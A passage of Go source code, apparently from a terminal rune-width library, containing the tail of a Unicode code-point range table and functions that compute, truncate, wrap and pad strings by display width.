{0x22C0, 0x22FF}, {0x2300, 0x2307}, {0x2308, 0x2308},
{0x2309, 0x2309}, {0x230A, 0x230A}, {0x230B, 0x230B},
{0x230C, 0x2311}, {0x2313, 0x2319}, {0x231C, 0x231F},
{0x2320, 0x2321}, {0x2322, 0x2328}, {0x232B, 0x237B},
{0x237C, 0x237C}, {0x237D, 0x239A}, {0x239B, 0x23B3},
{0x23B4, 0x23DB}, {0x23DC, 0x23E1}, {0x23E2, 0x23E8},
{0x23ED, 0x23EF}, {0x23F1, 0x23F2}, {0x23F4, 0x23FE},
{0x2400, 0x2426}, {0x2440, 0x244A}, {0x24EA, 0x24EA},
{0x254C, 0x254F}, {0x2574, 0x257F}, {0x2590, 0x2591},
{0x2596, 0x259F}, {0x25A2, 0x25A2}, {0x25AA, 0x25B1},
{0x25B4, 0x25B5}, {0x25B8, 0x25BB}, {0x25BE, 0x25BF},
{0x25C2, 0x25C5}, {0x25C9, 0x25CA}, {0x25CC, 0x25CD},
{0x25D2, 0x25E1}, {0x25E6, 0x25EE}, {0x25F0, 0x25F7},
{0x25F8, 0x25FC}, {0x25FF, 0x25FF}, {0x2600, 0x2604},
{0x2607, 0x2608}, {0x260A, 0x260D}, {0x2610, 0x2613},
{0x2616, 0x261B}, {0x261D, 0x261D}, {0x261F, 0x263F},
{0x2641, 0x2641}, {0x2643, 0x2647}, {0x2654, 0x265F},
{0x2662, 0x2662}, {0x2666, 0x2666}, {0x266B, 0x266B},
{0x266E, 0x266E}, {0x2670, 0x267E}, {0x2680, 0x2692},
{0x2694, 0x269D}, {0x26A0, 0x26A0}, {0x26A2, 0x26A9},
{0x26AC, 0x26BC}, {0x26C0, 0x26C3}, {0x26E2, 0x26E2},
{0x26E4, 0x26E7}, {0x2700, 0x2704}, {0x2706, 0x2709},
{0x270C, 0x2727}, {0x2729, 0x273C}, {0x273E, 0x274B},
{0x274D, 0x274D}, {0x274F, 0x2752}, {0x2756, 0x2756},
{0x2758, 0x2767}, {0x2768, 0x2768}, {0x2769, 0x2769},
{0x276A, 0x276A}, {0x276B, 0x276B}, {0x276C, 0x276C},
{0x276D, 0x276D}, {0x276E, 0x276E}, {0x276F, 0x276F},
{0x2770, 0x2770}, {0x2771, 0x2771}, {0x2772, 0x2772},
{0x2773, 0x2773}, {0x2774, 0x2774}, {0x2775, 0x2775},
{0x2780, 0x2793}, {0x2794, 0x2794}, {0x2798, 0x27AF},
{0x27B1, 0x27BE}, {0x27C0, 0x27C4}, {0x27C5, 0x27C5},
{0x27C6, 0x27C6}, {0x27C7, 0x27E5}, {0x27EE, 0x27EE},
{0x27EF, 0x27EF}, {0x27F0, 0x27FF}, {0x2800, 0x28FF},
{0x2900, 0x297F}, {0x2980, 0x2982}, {0x2983, 0x2983},
{0x2984, 0x2984}, {0x2987, 0x2987}, {0x2988, 0x2988},
{0x2989, 0x2989}, {0x298A, 0x298A}, {0x298B, 0x298B},
{0x298C, 0x298C}, {0x298D, 0x298D}, {0x298E, 0x298E},
{0x298F, 0x298F}, {0x2990, 0x2990}, {0x2991, 0x2991},
{0x2992, 0x2992}, {0x2993, 0x2993}, {0x2994, 0x2994},
{0x2995, 0x2995}, {0x2996, 0x2996}, {0x2997, 0x2997},
{0x2998, 0x2998}, {0x2999, 0x29D7}, {0x29D8, 0x29D8},
{0x29D9, 0x29D9}, {0x29DA, 0x29DA}, {0x29DB, 0x29DB},
{0x29DC, 0x29FB}, {0x29FC, 0x29FC}, {0x29FD, 0x29FD},
{0x29FE, 0x29FF}, {0x2A00, 0x2AFF}, {0x2B00, 0x2B1A},
{0x2B1D, 0x2B2F}, {0x2B30, 0x2B44}, {0x2B45, 0x2B46},
{0x2B47, 0x2B4C}, {0x2B4D, 0x2B4F}, {0x2B51, 0x2B54},
{0x2B5A, 0x2B73}, {0x2B76, 0x2B95}, {0x2B98, 0x2BB9},
{0x2BBD, 0x2BC8}, {0x2BCA, 0x2BD1}, {0x2BEC, 0x2BEF},
{0x2C00, 0x2C2E}, {0x2C30, 0x2C5E}, {0x2C60, 0x2C7B},
{0x2C7C, 0x2C7D}, {0x2C7E, 0x2C7F}, {0x2C80, 0x2CE4},
{0x2CE5, 0x2CEA}, {0x2CEB, 0x2CEE}, {0x2CEF, 0x2CF1},
{0x2CF2, 0x2CF3}, {0x2CF9, 0x2CFC}, {0x2CFD, 0x2CFD},
{0x2CFE, 0x2CFF}, {0x2D00, 0x2D25}, {0x2D27, 0x2D27},
{0x2D2D, 0x2D2D}, {0x2D30, 0x2D67}, {0x2D6F, 0x2D6F},
{0x2D70, 0x2D70}, {0x2D7F, 0x2D7F}, {0x2D80, 0x2D96},
{0x2DA0, 0x2DA6}, {0x2DA8, 0x2DAE}, {0x2DB0, 0x2DB6},
{0x2DB8, 0x2DBE}, {0x2DC0, 0x2DC6}, {0x2DC8, 0x2DCE},
{0x2DD0, 0x2DD6}, {0x2DD8, 0x2DDE}, {0x2DE0, 0x2DFF},
{0x2E00, 0x2E01}, {0x2E02, 0x2E02}, {0x2E03, 0x2E03},
{0x2E04, 0x2E04}, {0x2E05, 0x2E05}, {0x2E06, 0x2E08},
{0x2E09, 0x2E09}, {0x2E0A, 0x2E0A}, {0x2E0B, 0x2E0B},
{0x2E0C, 0x2E0C}, {0x2E0D, 0x2E0D}, {0x2E0E, 0x2E16},
{0x2E17, 0x2E17}, {0x2E18, 0x2E19}, {0x2E1A, 0x2E1A},
{0x2E1B, 0x2E1B}, {0x2E1C, 0x2E1C}, {0x2E1D, 0x2E1D},
{0x2E1E, 0x2E1F}, {0x2E20, 0x2E20}, {0x2E21, 0x2E21},
{0x2E22, 0x2E22}, {0x2E23, 0x2E23}, {0x2E24, 0x2E24},
{0x2E25, 0x2E25}, {0x2E26, 0x2E26}, {0x2E27, 0x2E27},
{0x2E28, 0x2E28}, {0x2E29, 0x2E29}, {0x2E2A, 0x2E2E},
{0x2E2F, 0x2E2F}, {0x2E30, 0x2E39}, {0x2E3A, 0x2E3B},
{0x2E3C, 0x2E3F}, {0x2E40, 0x2E40}, {0x2E41, 0x2E41},
{0x2E42, 0x2E42}, {0x2E43, 0x2E44}, {0x303F, 0x303F},
{0x4DC0, 0x4DFF}, {0xA4D0, 0xA4F7}, {0xA4F8, 0xA4FD},
{0xA4FE, 0xA4FF}, {0xA500, 0xA60B}, {0xA60C, 0xA60C},
{0xA60D, 0xA60F}, {0xA610, 0xA61F}, {0xA620, 0xA629},
{0xA62A, 0xA62B}, {0xA640, 0xA66D}, {0xA66E, 0xA66E},
{0xA66F, 0xA66F}, {0xA670, 0xA672}, {0xA673, 0xA673},
{0xA674, 0xA67D}, {0xA67E, 0xA67E}, {0xA67F, 0xA67F},
{0xA680, 0xA69B}, {0xA69C, 0xA69D}, {0xA69E, 0xA69F},
{0xA6A0, 0xA6E5}, {0xA6E6, 0xA6EF}, {0xA6F0, 0xA6F1},
{0xA6F2, 0xA6F7}, {0xA700, 0xA716}, {0xA717, 0xA71F},
{0xA720, 0xA721}, {0xA722, 0xA76F}, {0xA770, 0xA770},
{0xA771, 0xA787}, {0xA788, 0xA788}, {0xA789, 0xA78A},
{0xA78B, 0xA78E}, {0xA78F, 0xA78F}, {0xA790, 0xA7AE},
{0xA7B0, 0xA7B7}, {0xA7F7, 0xA7F7}, {0xA7F8, 0xA7F9},
{0xA7FA, 0xA7FA}, {0xA7FB, 0xA7FF}, {0xA800, 0xA801},
{0xA802, 0xA802}, {0xA803, 0xA805}, {0xA806, 0xA806},
{0xA807, 0xA80A}, {0xA80B, 0xA80B}, {0xA80C, 0xA822},
{0xA823, 0xA824}, {0xA825, 0xA826}, {0xA827, 0xA827},
{0xA828, 0xA82B}, {0xA830, 0xA835}, {0xA836, 0xA837},
{0xA838, 0xA838}, {0xA839, 0xA839}, {0xA840, 0xA873},
{0xA874, 0xA877}, {0xA880, 0xA881}, {0xA882, 0xA8B3},
{0xA8B4, 0xA8C3}, {0xA8C4, 0xA8C5}, {0xA8CE, 0xA8CF},
{0xA8D0, 0xA8D9}, {0xA8E0, 0xA8F1}, {0xA8F2, 0xA8F7},
{0xA8F8, 0xA8FA}, {0xA8FB, 0xA8FB}, {0xA8FC, 0xA8FC},
{0xA8FD, 0xA8FD}, {0xA900, 0xA909}, {0xA90A, 0xA925},
{0xA926, 0xA92D}, {0xA92E, 0xA92F}, {0xA930, 0xA946},
{0xA947, 0xA951}, {0xA952, 0xA953}, {0xA95F, 0xA95F},
{0xA980, 0xA982}, {0xA983, 0xA983}, {0xA984, 0xA9B2},
{0xA9B3, 0xA9B3}, {0xA9B4, 0xA9B5}, {0xA9B6, 0xA9B9},
{0xA9BA, 0xA9BB}, {0xA9BC, 0xA9BC}, {0xA9BD, 0xA9C0},
{0xA9C1, 0xA9CD}, {0xA9CF, 0xA9CF}, {0xA9D0, 0xA9D9},
{0xA9DE, 0xA9DF}, {0xA9E0, 0xA9E4}, {0xA9E5, 0xA9E5},
{0xA9E6, 0xA9E6}, {0xA9E7, 0xA9EF}, {0xA9F0, 0xA9F9},
{0xA9FA, 0xA9FE}, {0xAA00, 0xAA28}, {0xAA29, 0xAA2E},
{0xAA2F, 0xAA30}, {0xAA31, 0xAA32}, {0xAA33, 0xAA34},
{0xAA35, 0xAA36}, {0xAA40, 0xAA42}, {0xAA43, 0xAA43},
{0xAA44, 0xAA4B}, {0xAA4C, 0xAA4C}, {0xAA4D, 0xAA4D},
{0xAA50, 0xAA59}, {0xAA5C, 0xAA5F}, {0xAA60, 0xAA6F},
{0xAA70, 0xAA70}, {0xAA71, 0xAA76}, {0xAA77, 0xAA79},
{0xAA7A, 0xAA7A}, {0xAA7B, 0xAA7B}, {0xAA7C, 0xAA7C},
{0xAA7D, 0xAA7D}, {0xAA7E, 0xAA7F}, {0xAA80, 0xAAAF},
{0xAAB0, 0xAAB0}, {0xAAB1, 0xAAB1}, {0xAAB2, 0xAAB4},
{0xAAB5, 0xAAB6}, {0xAAB7, 0xAAB8}, {0xAAB9, 0xAABD},
{0xAABE, 0xAABF}, {0xAAC0, 0xAAC0}, {0xAAC1, 0xAAC1},
{0xAAC2, 0xAAC2}, {0xAADB, 0xAADC}, {0xAADD, 0xAADD},
{0xAADE, 0xAADF}, {0xAAE0, 0xAAEA}, {0xAAEB, 0xAAEB},
{0xAAEC, 0xAAED}, {0xAAEE, 0xAAEF}, {0xAAF0, 0xAAF1},
{0xAAF2, 0xAAF2}, {0xAAF3, 0xAAF4}, {0xAAF5, 0xAAF5},
{0xAAF6, 0xAAF6}, {0xAB01, 0xAB06}, {0xAB09, 0xAB0E},
{0xAB11, 0xAB16}, {0xAB20, 0xAB26}, {0xAB28, 0xAB2E},
{0xAB30, 0xAB5A}, {0xAB5B, 0xAB5B}, {0xAB5C, 0xAB5F},
{0xAB60, 0xAB65}, {0xAB70, 0xABBF}, {0xABC0, 0xABE2},
{0xABE3, 0xABE4}, {0xABE5, 0xABE5}, {0xABE6, 0xABE7},
{0xABE8, 0xABE8}, {0xABE9, 0xABEA}, {0xABEB, 0xABEB},
{0xABEC, 0xABEC}, {0xABED, 0xABED}, {0xABF0, 0xABF9},
{0xD7B0, 0xD7C6}, {0xD7CB, 0xD7FB}, {0xD800, 0xDB7F},
{0xDB80, 0xDBFF}, {0xDC00, 0xDFFF}, {0xFB00, 0xFB06},
{0xFB13, 0xFB17}, {0xFB1D, 0xFB1D}, {0xFB1E, 0xFB1E},
{0xFB1F, 0xFB28}, {0xFB29, 0xFB29}, {0xFB2A, 0xFB36},
{0xFB38, 0xFB3C}, {0xFB3E, 0xFB3E}, {0xFB40, 0xFB41},
{0xFB43, 0xFB44}, {0xFB46, 0xFB4F}, {0xFB50, 0xFBB1},
{0xFBB2, 0xFBC1}, {0xFBD3, 0xFD3D}, {0xFD3E, 0xFD3E},
{0xFD3F, 0xFD3F}, {0xFD50, 0xFD8F}, {0xFD92, 0xFDC7},
{0xFDF0, 0xFDFB}, {0xFDFC, 0xFDFC}, {0xFDFD, 0xFDFD},
{0xFE20, 0xFE2F}, {0xFE70, 0xFE74}, {0xFE76, 0xFEFC},
{0xFEFF, 0xFEFF}, {0xFFF9, 0xFFFB}, {0xFFFC, 0xFFFC},
{0x10000, 0x1000B}, {0x1000D, 0x10026}, {0x10028, 0x1003A},
{0x1003C, 0x1003D}, {0x1003F, 0x1004D}, {0x10050, 0x1005D},
{0x10080, 0x100FA}, {0x10100, 0x10102}, {0x10107, 0x10133},
{0x10137, 0x1013F}, {0x10140, 0x10174}, {0x10175, 0x10178},
{0x10179, 0x10189}, {0x1018A, 0x1018B}, {0x1018C, 0x1018E},
{0x10190, 0x1019B}, {0x101A0, 0x101A0}, {0x101D0, 0x101FC},
{0x101FD, 0x101FD}, {0x10280, 0x1029C}, {0x102A0, 0x102D0},
{0x102E0, 0x102E0}, {0x102E1, 0x102FB}, {0x10300, 0x1031F},
{0x10320, 0x10323}, {0x10330, 0x10340}, {0x10341, 0x10341},
{0x10342, 0x10349}, {0x1034A, 0x1034A}, {0x10350, 0x10375},
{0x10376, 0x1037A}, {0x10380, 0x1039D}, {0x1039F, 0x1039F},
{0x103A0, 0x103C3}, {0x103C8, 0x103CF}, {0x103D0, 0x103D0},
{0x103D1, 0x103D5}, {0x10400, 0x1044F}, {0x10450, 0x1047F},
{0x10480, 0x1049D}, {0x104A0, 0x104A9}, {0x104B0, 0x104D3},
{0x104D8, 0x104FB}, {0x10500, 0x10527}, {0x10530, 0x10563},
{0x1056F, 0x1056F}, {0x10600, 0x10736}, {0x10740, 0x10755},
{0x10760, 0x10767}, {0x10800, 0x10805}, {0x10808, 0x10808},
{0x1080A, 0x10835}, {0x10837, 0x10838}, {0x1083C, 0x1083C},
{0x1083F, 0x1083F}, {0x10840, 0x10855}, {0x10857, 0x10857},
{0x10858, 0x1085F}, {0x10860, 0x10876}, {0x10877, 0x10878},
{0x10879, 0x1087F}, {0x10880, 0x1089E}, {0x108A7, 0x108AF},
{0x108E0, 0x108F2}, {0x108F4, 0x108F5}, {0x108FB, 0x108FF},
{0x10900, 0x10915}, {0x10916, 0x1091B}, {0x1091F, 0x1091F},
{0x10920, 0x10939}, {0x1093F, 0x1093F}, {0x10980, 0x1099F},
{0x109A0, 0x109B7}, {0x109BC, 0x109BD}, {0x109BE, 0x109BF},
{0x109C0, 0x109CF}, {0x109D2, 0x109FF}, {0x10A00, 0x10A00},
{0x10A01, 0x10A03}, {0x10A05, 0x10A06}, {0x10A0C, 0x10A0F},
{0x10A10, 0x10A13}, {0x10A15, 0x10A17}, {0x10A19, 0x10A33},
{0x10A38, 0x10A3A}, {0x10A3F, 0x10A3F}, {0x10A40, 0x10A47},
{0x10A50, 0x10A58}, {0x10A60, 0x10A7C}, {0x10A7D, 0x10A7E},
{0x10A7F, 0x10A7F}, {0x10A80, 0x10A9C}, {0x10A9D, 0x10A9F},
{0x10AC0, 0x10AC7}, {0x10AC8, 0x10AC8}, {0x10AC9, 0x10AE4},
{0x10AE5, 0x10AE6}, {0x10AEB, 0x10AEF}, {0x10AF0, 0x10AF6},
{0x10B00, 0x10B35}, {0x10B39, 0x10B3F}, {0x10B40, 0x10B55},
{0x10B58, 0x10B5F}, {0x10B60, 0x10B72}, {0x10B78, 0x10B7F},
{0x10B80, 0x10B91}, {0x10B99, 0x10B9C}, {0x10BA9, 0x10BAF},
{0x10C00, 0x10C48}, {0x10C80, 0x10CB2}, {0x10CC0, 0x10CF2},
{0x10CFA, 0x10CFF}, {0x10E60, 0x10E7E}, {0x11000, 0x11000},
{0x11001, 0x11001}, {0x11002, 0x11002}, {0x11003, 0x11037},
{0x11038, 0x11046}, {0x11047, 0x1104D}, {0x11052, 0x11065},
{0x11066, 0x1106F}, {0x1107F, 0x1107F}, {0x11080, 0x11081},
{0x11082, 0x11082}, {0x11083, 0x110AF}, {0x110B0, 0x110B2},
{0x110B3, 0x110B6}, {0x110B7, 0x110B8}, {0x110B9, 0x110BA},
{0x110BB, 0x110BC}, {0x110BD, 0x110BD}, {0x110BE, 0x110C1},
{0x110D0, 0x110E8}, {0x110F0, 0x110F9}, {0x11100, 0x11102},
{0x11103, 0x11126}, {0x11127, 0x1112B}, {0x1112C, 0x1112C},
{0x1112D, 0x11134}, {0x11136, 0x1113F}, {0x11140, 0x11143},
{0x11150, 0x11172}, {0x11173, 0x11173}, {0x11174, 0x11175},
{0x11176, 0x11176}, {0x11180, 0x11181}, {0x11182, 0x11182},
{0x11183, 0x111B2}, {0x111B3, 0x111B5}, {0x111B6, 0x111BE},
{0x111BF, 0x111C0}, {0x111C1, 0x111C4}, {0x111C5, 0x111C9},
{0x111CA, 0x111CC}, {0x111CD, 0x111CD}, {0x111D0, 0x111D9},
{0x111DA, 0x111DA}, {0x111DB, 0x111DB}, {0x111DC, 0x111DC},
{0x111DD, 0x111DF}, {0x111E1, 0x111F4}, {0x11200, 0x11211},
{0x11213, 0x1122B}, {0x1122C, 0x1122E}, {0x1122F, 0x11231},
{0x11232, 0x11233}, {0x11234, 0x11234}, {0x11235, 0x11235},
{0x11236, 0x11237}, {0x11238, 0x1123D}, {0x1123E, 0x1123E},
{0x11280, 0x11286}, {0x11288, 0x11288}, {0x1128A, 0x1128D},
{0x1128F, 0x1129D}, {0x1129F, 0x112A8}, {0x112A9, 0x112A9},
{0x112B0, 0x112DE}, {0x112DF, 0x112DF}, {0x112E0, 0x112E2},
{0x112E3, 0x112EA}, {0x112F0, 0x112F9}, {0x11300, 0x11301},
{0x11302, 0x11303}, {0x11305, 0x1130C}, {0x1130F, 0x11310},
{0x11313, 0x11328}, {0x1132A, 0x11330}, {0x11332, 0x11333},
{0x11335, 0x11339}, {0x1133C, 0x1133C}, {0x1133D, 0x1133D},
{0x1133E, 0x1133F}, {0x11340, 0x11340}, {0x11341, 0x11344},
{0x11347, 0x11348}, {0x1134B, 0x1134D}, {0x11350, 0x11350},
{0x11357, 0x11357}, {0x1135D, 0x11361}, {0x11362, 0x11363},
{0x11366, 0x1136C}, {0x11370, 0x11374}, {0x11400, 0x11434},
{0x11435, 0x11437}, {0x11438, 0x1143F}, {0x11440, 0x11441},
{0x11442, 0x11444}, {0x11445, 0x11445}, {0x11446, 0x11446},
{0x11447, 0x1144A}, {0x1144B, 0x1144F}, {0x11450, 0x11459},
{0x1145B, 0x1145B}, {0x1145D, 0x1145D}, {0x11480, 0x114AF},
{0x114B0, 0x114B2}, {0x114B3, 0x114B8}, {0x114B9, 0x114B9},
{0x114BA, 0x114BA}, {0x114BB, 0x114BE}, {0x114BF, 0x114C0},
{0x114C1, 0x114C1}, {0x114C2, 0x114C3}, {0x114C4, 0x114C5},
{0x114C6, 0x114C6}, {0x114C7, 0x114C7}, {0x114D0, 0x114D9},
{0x11580, 0x115AE}, {0x115AF, 0x115B1}, {0x115B2, 0x115B5},
{0x115B8, 0x115BB}, {0x115BC, 0x115BD}, {0x115BE, 0x115BE},
{0x115BF, 0x115C0}, {0x115C1, 0x115D7}, {0x115D8, 0x115DB},
{0x115DC, 0x115DD}, {0x11600, 0x1162F}, {0x11630, 0x11632},
{0x11633, 0x1163A}, {0x1163B, 0x1163C}, {0x1163D, 0x1163D},
{0x1163E, 0x1163E}, {0x1163F, 0x11640}, {0x11641, 0x11643},
{0x11644, 0x11644}, {0x11650, 0x11659}, {0x11660, 0x1166C},
{0x11680, 0x116AA}, {0x116AB, 0x116AB}, {0x116AC, 0x116AC},
{0x116AD, 0x116AD}, {0x116AE, 0x116AF}, {0x116B0, 0x116B5},
{0x116B6, 0x116B6}, {0x116B7, 0x116B7}, {0x116C0, 0x116C9},
{0x11700, 0x11719}, {0x1171D, 0x1171F}, {0x11720, 0x11721},
{0x11722, 0x11725}, {0x11726, 0x11726}, {0x11727, 0x1172B},
{0x11730, 0x11739}, {0x1173A, 0x1173B}, {0x1173C, 0x1173E},
{0x1173F, 0x1173F}, {0x118A0, 0x118DF}, {0x118E0, 0x118E9},
{0x118EA, 0x118F2}, {0x118FF, 0x118FF}, {0x11AC0, 0x11AF8},
{0x11C00, 0x11C08}, {0x11C0A, 0x11C2E}, {0x11C2F, 0x11C2F},
{0x11C30, 0x11C36}, {0x11C38, 0x11C3D}, {0x11C3E, 0x11C3E},
{0x11C3F, 0x11C3F}, {0x11C40, 0x11C40}, {0x11C41, 0x11C45},
{0x11C50, 0x11C59}, {0x11C5A, 0x11C6C}, {0x11C70, 0x11C71},
{0x11C72, 0x11C8F}, {0x11C92, 0x11CA7}, {0x11CA9, 0x11CA9},
{0x11CAA, 0x11CB0}, {0x11CB1, 0x11CB1}, {0x11CB2, 0x11CB3},
{0x11CB4, 0x11CB4}, {0x11CB5, 0x11CB6}, {0x12000, 0x12399},
{0x12400, 0x1246E}, {0x12470, 0x12474}, {0x12480, 0x12543},
{0x13000, 0x1342E}, {0x14400, 0x14646}, {0x16800, 0x16A38},
{0x16A40, 0x16A5E}, {0x16A60, 0x16A69}, {0x16A6E, 0x16A6F},
{0x16AD0, 0x16AED}, {0x16AF0, 0x16AF4}, {0x16AF5, 0x16AF5},
{0x16B00, 0x16B2F}, {0x16B30, 0x16B36}, {0x16B37, 0x16B3B},
{0x16B3C, 0x16B3F}, {0x16B40, 0x16B43}, {0x16B44, 0x16B44},
{0x16B45, 0x16B45}, {0x16B50, 0x16B59}, {0x16B5B, 0x16B61},
{0x16B63, 0x16B77}, {0x16B7D, 0x16B8F}, {0x16F00, 0x16F44},
{0x16F50, 0x16F50}, {0x16F51, 0x16F7E}, {0x16F8F, 0x16F92},
{0x16F93, 0x16F9F}, {0x1BC00, 0x1BC6A}, {0x1BC70, 0x1BC7C},
{0x1BC80, 0x1BC88}, {0x1BC90, 0x1BC99}, {0x1BC9C, 0x1BC9C},
{0x1BC9D, 0x1BC9E}, {0x1BC9F, 0x1BC9F}, {0x1BCA0, 0x1BCA3},
{0x1D000, 0x1D0F5}, {0x1D100, 0x1D126}, {0x1D129, 0x1D164},
{0x1D165, 0x1D166}, {0x1D167, 0x1D169}, {0x1D16A, 0x1D16C},
{0x1D16D, 0x1D172}, {0x1D173, 0x1D17A}, {0x1D17B, 0x1D182},
{0x1D183, 0x1D184}, {0x1D185, 0x1D18B}, {0x1D18C, 0x1D1A9},
{0x1D1AA, 0x1D1AD}, {0x1D1AE, 0x1D1E8}, {0x1D200, 0x1D241},
{0x1D242, 0x1D244}, {0x1D245, 0x1D245}, {0x1D300, 0x1D356},
{0x1D360, 0x1D371}, {0x1D400, 0x1D454}, {0x1D456, 0x1D49C},
{0x1D49E, 0x1D49F}, {0x1D4A2, 0x1D4A2}, {0x1D4A5, 0x1D4A6},
{0x1D4A9, 0x1D4AC}, {0x1D4AE, 0x1D4B9}, {0x1D4BB, 0x1D4BB},
{0x1D4BD, 0x1D4C3}, {0x1D4C5, 0x1D505}, {0x1D507, 0x1D50A},
{0x1D50D, 0x1D514}, {0x1D516, 0x1D51C}, {0x1D51E, 0x1D539},
{0x1D53B, 0x1D53E}, {0x1D540, 0x1D544}, {0x1D546, 0x1D546},
{0x1D54A, 0x1D550}, {0x1D552, 0x1D6A5}, {0x1D6A8, 0x1D6C0},
{0x1D6C1, 0x1D6C1}, {0x1D6C2, 0x1D6DA}, {0x1D6DB, 0x1D6DB},
{0x1D6DC, 0x1D6FA}, {0x1D6FB, 0x1D6FB}, {0x1D6FC, 0x1D714},
{0x1D715, 0x1D715}, {0x1D716, 0x1D734}, {0x1D735, 0x1D735},
{0x1D736, 0x1D74E}, {0x1D74F, 0x1D74F}, {0x1D750, 0x1D76E},
{0x1D76F, 0x1D76F}, {0x1D770, 0x1D788}, {0x1D789, 0x1D789},
{0x1D78A, 0x1D7A8}, {0x1D7A9, 0x1D7A9}, {0x1D7AA, 0x1D7C2},
{0x1D7C3, 0x1D7C3}, {0x1D7C4, 0x1D7CB}, {0x1D7CE, 0x1D7FF},
{0x1D800, 0x1D9FF}, {0x1DA00, 0x1DA36}, {0x1DA37, 0x1DA3A},
{0x1DA3B, 0x1DA6C}, {0x1DA6D, 0x1DA74}, {0x1DA75, 0x1DA75},
{0x1DA76, 0x1DA83}, {0x1DA84, 0x1DA84}, {0x1DA85, 0x1DA86},
{0x1DA87, 0x1DA8B}, {0x1DA9B, 0x1DA9F}, {0x1DAA1, 0x1DAAF},
{0x1E000, 0x1E006}, {0x1E008, 0x1E018}, {0x1E01B, 0x1E021},
{0x1E023, 0x1E024}, {0x1E026, 0x1E02A}, {0x1E800, 0x1E8C4},
{0x1E8C7, 0x1E8CF}, {0x1E8D0, 0x1E8D6}, {0x1E900, 0x1E943},
{0x1E944, 0x1E94A}, {0x1E950, 0x1E959}, {0x1E95E, 0x1E95F},
{0x1EE00, 0x1EE03}, {0x1EE05, 0x1EE1F}, {0x1EE21, 0x1EE22},
{0x1EE24, 0x1EE24}, {0x1EE27, 0x1EE27}, {0x1EE29, 0x1EE32},
{0x1EE34, 0x1EE37}, {0x1EE39, 0x1EE39}, {0x1EE3B, 0x1EE3B},
{0x1EE42, 0x1EE42}, {0x1EE47, 0x1EE47}, {0x1EE49, 0x1EE49},
{0x1EE4B, 0x1EE4B}, {0x1EE4D, 0x1EE4F}, {0x1EE51, 0x1EE52},
{0x1EE54, 0x1EE54}, {0x1EE57, 0x1EE57}, {0x1EE59, 0x1EE59},
{0x1EE5B, 0x1EE5B}, {0x1EE5D, 0x1EE5D}, {0x1EE5F, 0x1EE5F},
{0x1EE61, 0x1EE62}, {0x1EE64, 0x1EE64}, {0x1EE67, 0x1EE6A},
{0x1EE6C, 0x1EE72}, {0x1EE74, 0x1EE77}, {0x1EE79, 0x1EE7C},
{0x1EE7E, 0x1EE7E}, {0x1EE80, 0x1EE89}, {0x1EE8B, 0x1EE9B},
{0x1EEA1, 0x1EEA3}, {0x1EEA5, 0x1EEA9}, {0x1EEAB, 0x1EEBB},
{0x1EEF0, 0x1EEF1}, {0x1F000, 0x1F003}, {0x1F005, 0x1F02B},
{0x1F030, 0x1F093}, {0x1F0A0, 0x1F0AE}, {0x1F0B1, 0x1F0BF},
{0x1F0C1, 0x1F0CE}, {0x1F0D1, 0x1F0F5}, {0x1F10B, 0x1F10C},
{0x1F12E, 0x1F12E}, {0x1F16A, 0x1F16B}, {0x1F1E6, 0x1F1FF},
{0x1F321, 0x1F32C}, {0x1F336, 0x1F336}, {0x1F37D, 0x1F37D},
{0x1F394, 0x1F39F}, {0x1F3CB, 0x1F3CE}, {0x1F3D4, 0x1F3DF},
{0x1F3F1, 0x1F3F3}, {0x1F3F5, 0x1F3F7}, {0x1F43F, 0x1F43F},
{0x1F441, 0x1F441}, {0x1F4FD, 0x1F4FE}, {0x1F53E, 0x1F54A},
{0x1F54F, 0x1F54F}, {0x1F568, 0x1F579}, {0x1F57B, 0x1F594},
{0x1F597, 0x1F5A3}, {0x1F5A5, 0x1F5FA}, {0x1F650, 0x1F67F},
{0x1F6C6, 0x1F6CB}, {0x1F6CD, 0x1F6CF}, {0x1F6E0, 0x1F6EA},
{0x1F6F0, 0x1F6F3}, {0x1F700, 0x1F773}, {0x1F780, 0x1F7D4},
{0x1F800, 0x1F80B}, {0x1F810, 0x1F847}, {0x1F850, 0x1F859},
{0x1F860, 0x1F887}, {0x1F890, 0x1F8AD}, {0xE0001, 0xE0001},
{0xE0020, 0xE007F},
}
// Condition have flag EastAsianWidth whether the current locale is CJK or not.
type Condition struct {
EastAsianWidth bool
}
// NewCondition return new instance of Condition which is current locale.
func NewCondition() *Condition {
return &Condition{EastAsianWidth}
}
// RuneWidth returns the number of cells in r.
// See path_to_url
func (c *Condition) RuneWidth(r rune) int {
switch {
case r < 0 || r > 0x10FFFF ||
inTables(r, nonprint, combining, notassigned):
return 0
case (c.EastAsianWidth && IsAmbiguousWidth(r)) ||
inTables(r, doublewidth, emoji):
return 2
default:
return 1
}
}
// StringWidth return width as you can see
func (c *Condition) StringWidth(s string) (width int) {
for _, r := range []rune(s) {
width += c.RuneWidth(r)
}
return width
}
// Truncate return string truncated with w cells
func (c *Condition) Truncate(s string, w int, tail string) string {
if c.StringWidth(s) <= w {
return s
}
r := []rune(s)
tw := c.StringWidth(tail)
w -= tw
width := 0
i := 0
for ; i < len(r); i++ {
cw := c.RuneWidth(r[i])
if width+cw > w {
break
}
width += cw
}
return string(r[0:i]) + tail
}
// Wrap return string wrapped with w cells
func (c *Condition) Wrap(s string, w int) string {
width := 0
out := ""
for _, r := range []rune(s) {
cw := RuneWidth(r)
if r == '\n' {
out += string(r)
width = 0
continue
} else if width+cw > w {
out += "\n"
width = 0
out += string(r)
width += cw
continue
}
out += string(r)
width += cw
}
return out
}
// FillLeft return string filled in left by spaces in w cells
func (c *Condition) FillLeft(s string, w int) string {
width := c.StringWidth(s)
count := w - width
if count > 0 {
b := make([]byte, count)
for i := range b {
b[i] = ' '
}
return string(b) + s
}
return s
}
// FillRight return string filled in left by spaces in w cells
func (c *Condition) FillRight(s string, w int) string {
width := c.StringWidth(s)
count := w - width
if count > 0 {
b := make([]byte, count)
for i := range b {
b[i] = ' '
}
return s + string(b)
}
return s
}
// RuneWidth returns the number of cells in r.
// See path_to_url
func RuneWidth(r rune) int {
return DefaultCondition.RuneWidth(r)
}
// IsAmbiguousWidth returns whether is ambiguous width or not.
func IsAmbiguousWidth(r rune) bool {
return inTables(r, private, ambiguous)
}
// IsNeutralWidth returns whether is neutral width or not.
func IsNeutralWidth(r rune) bool {
return inTable(r, neutral)
}
// StringWidth return width as you can see
func StringWidth(s string) (width int) {
return DefaultCondition.StringWidth(s)
}
// Truncate return string truncated with w cells
func Truncate(s string, w int, tail string) string {
return DefaultCondition.Truncate(s, w, tail)
}
// Wrap return string wrapped with w cells
func Wrap(s string, w int) string {
return DefaultCondition.Wrap(s, w)
}
// FillLeft return string filled in left by spaces in w cells
